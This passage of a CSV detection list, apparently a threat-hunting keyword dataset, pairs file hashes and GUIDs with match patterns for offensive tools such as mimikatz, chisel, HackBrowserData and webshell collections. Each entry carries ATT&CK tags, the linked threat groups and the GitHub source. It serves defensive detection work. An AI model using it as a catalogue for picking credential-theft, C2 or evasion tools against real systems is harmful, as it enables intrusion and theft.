Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29499" "*7ad1f7ec564a2343ada204cfc7f8d903c7c7d623923bc5256551cc4d133d724f*",".{0,1000}7ad1f7ec564a2343ada204cfc7f8d903c7c7d623923bc5256551cc4d133d724f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29501" 
"*7adf4cdaa2190d19969e9f2fe6315d586fd5b709466ef2c84379b8b3a595ffc8*",".{0,1000}7adf4cdaa2190d19969e9f2fe6315d586fd5b709466ef2c84379b8b3a595ffc8.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","#filehash","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","29503" "*7aee9dfce2969dec078595083f096c526ad4336795da50b5a0bc6e5741a1215e*",".{0,1000}7aee9dfce2969dec078595083f096c526ad4336795da50b5a0bc6e5741a1215e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29505" "*7aeed302866656fbf84a03a45315c5b085ba45315b178732059e219a87f81644*",".{0,1000}7aeed302866656fbf84a03a45315c5b085ba45315b178732059e219a87f81644.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29506" "*7af03cf989ce48137cd2b74c1020fc42241d7dea7ffaf6ff67f16a23a302ad80*",".{0,1000}7af03cf989ce48137cd2b74c1020fc42241d7dea7ffaf6ff67f16a23a302ad80.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","29507" "*7af0afcd0f9db86c97a7357aaaedd26ab3746e828d5c0febdd063099d0d3fee9*",".{0,1000}7af0afcd0f9db86c97a7357aaaedd26ab3746e828d5c0febdd063099d0d3fee9.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","#filehash","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","29508" "*7afd2ebbf1c75880581e485fdd64d4b4cbb658a79cf271c0afa8092b8ce937ce*",".{0,1000}7afd2ebbf1c75880581e485fdd64d4b4cbb658a79cf271c0afa8092b8ce937ce.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29509" "*7afd2ebbf1c75880581e485fdd64d4b4cbb658a79cf271c0afa8092b8ce937ce*",".{0,1000}7afd2ebbf1c75880581e485fdd64d4b4cbb658a79cf271c0afa8092b8ce937ce.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","#filehash","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","29510" "*7afe06b8-59cc-41d2-9d75-65473ea93117*",".{0,1000}7afe06b8\-59cc\-41d2\-9d75\-65473ea93117.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#GUIDproject","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","29511" "*7afe27385edf41f8365eed21b7f34467b574f2cb91f618ddcae75024f6403c41*",".{0,1000}7afe27385edf41f8365eed21b7f34467b574f2cb91f618ddcae75024f6403c41.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","29512" "*7b033c4458195e7b30ef1f85ceab1cb7cd67d6f37fda3d3ce5fb1e3520799fbd*",".{0,1000}7b033c4458195e7b30ef1f85ceab1cb7cd67d6f37fda3d3ce5fb1e3520799fbd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29513" 
"*7b05dd49119858395e365446d7168cc725a999d9d98b7ccabfafc3b5da7a6f74*",".{0,1000}7b05dd49119858395e365446d7168cc725a999d9d98b7ccabfafc3b5da7a6f74.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29514" "*7b098959bdf3bc80d630a0a5eae9895c54f626a54f43848502ae3849152bd5f2*",".{0,1000}7b098959bdf3bc80d630a0a5eae9895c54f626a54f43848502ae3849152bd5f2.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29515" "*7b0e96b01da4d92b080da542be847cda9320ab3a3260f14c5360a3ceb86b2eb1*",".{0,1000}7b0e96b01da4d92b080da542be847cda9320ab3a3260f14c5360a3ceb86b2eb1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","29517" "*7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ*",".{0,1000}7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","29518" "*7b1aa993de7f49a7731c952cf3abedad501f45dc378e18b9b8245eaba78e72c5*",".{0,1000}7b1aa993de7f49a7731c952cf3abedad501f45dc378e18b9b8245eaba78e72c5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29519" "*7b1f95fad0a9d54d14ec51545fa5739a6b0764117843a3d468f387cfbe133e6f*",".{0,1000}7b1f95fad0a9d54d14ec51545fa5739a6b0764117843a3d468f387cfbe133e6f.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29520" "*7b206d4ff0ebe922b4242b4821c84f9e5c05579fdc4c43033ae9a45f6494cac9*",".{0,1000}7b206d4ff0ebe922b4242b4821c84f9e5c05579fdc4c43033ae9a45f6494cac9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29521" "*7b2ce8fed0da2a756ac78ee68f0885399ee5fa57e6a182e3b8fbffc1c523710d*",".{0,1000}7b2ce8fed0da2a756ac78ee68f0885399ee5fa57e6a182e3b8fbffc1c523710d.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","29524" "*7b399e28444f5bab4eb28f6c887e2eb0e5cef1e2b4c2ea8d51cae9ca5899deb1*",".{0,1000}7b399e28444f5bab4eb28f6c887e2eb0e5cef1e2b4c2ea8d51cae9ca5899deb1.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29525" "*7b39a858a51efa5160d65300b9b89695caf33ec380f69a40cdb7f742e8f05a46*",".{0,1000}7b39a858a51efa5160d65300b9b89695caf33ec380f69a40cdb7f742e8f05a46.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","#filehash","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","29526" "*7b41987489d49340783b4b6604899143c2c6c67f66708d80df217c509ff8b4dd*",".{0,1000}7b41987489d49340783b4b6604899143c2c6c67f66708d80df217c509ff8b4dd.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29528" 
"*7b49173186a78fa01b47056b8a3304f8f8b9a8d83bf2a0a342fa2e5597d745fb*",".{0,1000}7b49173186a78fa01b47056b8a3304f8f8b9a8d83bf2a0a342fa2e5597d745fb.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","29530" "*7b4abcd75af76bf67bc0028fd42083c4dfb81f4b27ac3e7b54bacb16436165b4*",".{0,1000}7b4abcd75af76bf67bc0028fd42083c4dfb81f4b27ac3e7b54bacb16436165b4.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","29531" "*7B4D3810-4A77-44A1-8546-779ACF02D083*",".{0,1000}7B4D3810\-4A77\-44A1\-8546\-779ACF02D083.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","#GUIDproject","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","29533" "*7b519e14d5860852dd54139ef9bff6a52a5e400afc6cbd1b6d7bc2a75ed674e6*",".{0,1000}7b519e14d5860852dd54139ef9bff6a52a5e400afc6cbd1b6d7bc2a75ed674e6.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","29534" 
"*7b5930fe71b9746fe6fd52455d84ddbc740d1730be6028473ed501058f0f393d*",".{0,1000}7b5930fe71b9746fe6fd52455d84ddbc740d1730be6028473ed501058f0f393d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29536" "*7b5b75b4087cb25515ce661dc7ad5be184faf4f3a03173f895e6f275ad18380e*",".{0,1000}7b5b75b4087cb25515ce661dc7ad5be184faf4f3a03173f895e6f275ad18380e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29537" "*7b6b043f894bb0f34244c9cb88dc1cf801d16010817d51fe7c1f6be2af6b91bf*",".{0,1000}7b6b043f894bb0f34244c9cb88dc1cf801d16010817d51fe7c1f6be2af6b91bf.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","29540" "*7b70c0af1d1d20eb090e2fad0afceef71e12b1083956dd7d58b181425478b764*",".{0,1000}7b70c0af1d1d20eb090e2fad0afceef71e12b1083956dd7d58b181425478b764.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm 
- KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29542" "*7b80732e0860de10d83b01b2071e96614b18ae9ed5642b8aaa829e37f3145201*",".{0,1000}7b80732e0860de10d83b01b2071e96614b18ae9ed5642b8aaa829e37f3145201.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","29545" "*7b81753062ad8adcc3012d1e1f78c6cbb5d8937e61a51f09a9d649bd153b0d03*",".{0,1000}7b81753062ad8adcc3012d1e1f78c6cbb5d8937e61a51f09a9d649bd153b0d03.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29546" "*7b8eebc200136f58a721bb5112df41c3af8ca87ed505e07787610d3d8e7775d9*",".{0,1000}7b8eebc200136f58a721bb5112df41c3af8ca87ed505e07787610d3d8e7775d9.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","29548" "*7b8f9e66368aa0606e480ca7b8c62cbbd2fc9ff726630f46ed45aa45e7786e62*",".{0,1000}7b8f9e66368aa0606e480ca7b8c62cbbd2fc9ff726630f46ed45aa45e7786e62.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - 
T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","29549" "*7b95cdf2630b4e94b8d09bf430308f54487e88928e63bda7a94a75255755809b*",".{0,1000}7b95cdf2630b4e94b8d09bf430308f54487e88928e63bda7a94a75255755809b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29550" "*7b95cdf2630b4e94b8d09bf430308f54487e88928e63bda7a94a75255755809b*",".{0,1000}7b95cdf2630b4e94b8d09bf430308f54487e88928e63bda7a94a75255755809b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29551" "*7b95cdf2630b4e94b8d09bf430308f54487e88928e63bda7a94a75255755809b*",".{0,1000}7b95cdf2630b4e94b8d09bf430308f54487e88928e63bda7a94a75255755809b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29552" "*7b97e3bd5491fc4a6c4a29b77dd36682e1bc7969a1ed8cb9abd4c1d4819eb00e*",".{0,1000}7b97e3bd5491fc4a6c4a29b77dd36682e1bc7969a1ed8cb9abd4c1d4819eb00e.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open 
proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29553" "*7ba12c9d99dc22ef178a75886a1c843302e65906d7c15e4aed54066fbae41667*",".{0,1000}7ba12c9d99dc22ef178a75886a1c843302e65906d7c15e4aed54066fbae41667.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29554" "*7ba905e8e4cba64f1df56bb1498c21193c9f02a36d86294c761f53bafaadded6*",".{0,1000}7ba905e8e4cba64f1df56bb1498c21193c9f02a36d86294c761f53bafaadded6.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","29556" "*7bb549f48f1f33ad7f2494b078459ddd2a70c39ccc34a6edf3c0b9cd5efc9031*",".{0,1000}7bb549f48f1f33ad7f2494b078459ddd2a70c39ccc34a6edf3c0b9cd5efc9031.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","29557" "*7bc64714fb90bddef226c04fb69f30d689384e3f0dfb89934c73ad1486e76e3a*",".{0,1000}7bc64714fb90bddef226c04fb69f30d689384e3f0dfb89934c73ad1486e76e3a.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#filehash","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","29559" "*7bc9e0e60db343690d6dcb61dd7f19c69fbd154234cbc38f7631f4a4a75fca8c*",".{0,1000}7bc9e0e60db343690d6dcb61dd7f19c69fbd154234cbc38f7631f4a4a75fca8c.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","#filehash","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","29560" 
"*7bcabfc6777e1141b116e4595e113148fca5c89fb5f8eb8c4fec519f91e483b8*",".{0,1000}7bcabfc6777e1141b116e4595e113148fca5c89fb5f8eb8c4fec519f91e483b8.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","29561" "*7BCD7440-845C-417B-8C2F-AA89D3AE8FD0*",".{0,1000}7BCD7440\-845C\-417B\-8C2F\-AA89D3AE8FD0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29562" "*7bcebf955c725d8d50ee161d523e06891dadb93fb98fc9fe74a1056c374c767c*",".{0,1000}7bcebf955c725d8d50ee161d523e06891dadb93fb98fc9fe74a1056c374c767c.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29563" "*7bd1a6f777a6e86907b0b3bf24cf013bb419a4fe24b9e0b2af23fce70d823c29*",".{0,1000}7bd1a6f777a6e86907b0b3bf24cf013bb419a4fe24b9e0b2af23fce70d823c29.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 
- TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","29564" "*7bd2ca96a2c189f15784e3a8294218b5760fb56e32e7fc5d29fbca0453a9185c*",".{0,1000}7bd2ca96a2c189f15784e3a8294218b5760fb56e32e7fc5d29fbca0453a9185c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29565" "*7be230cab89ef568b598e64885fe315c8983f300167a21b8279cc94cb99317a0*",".{0,1000}7be230cab89ef568b598e64885fe315c8983f300167a21b8279cc94cb99317a0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29567" 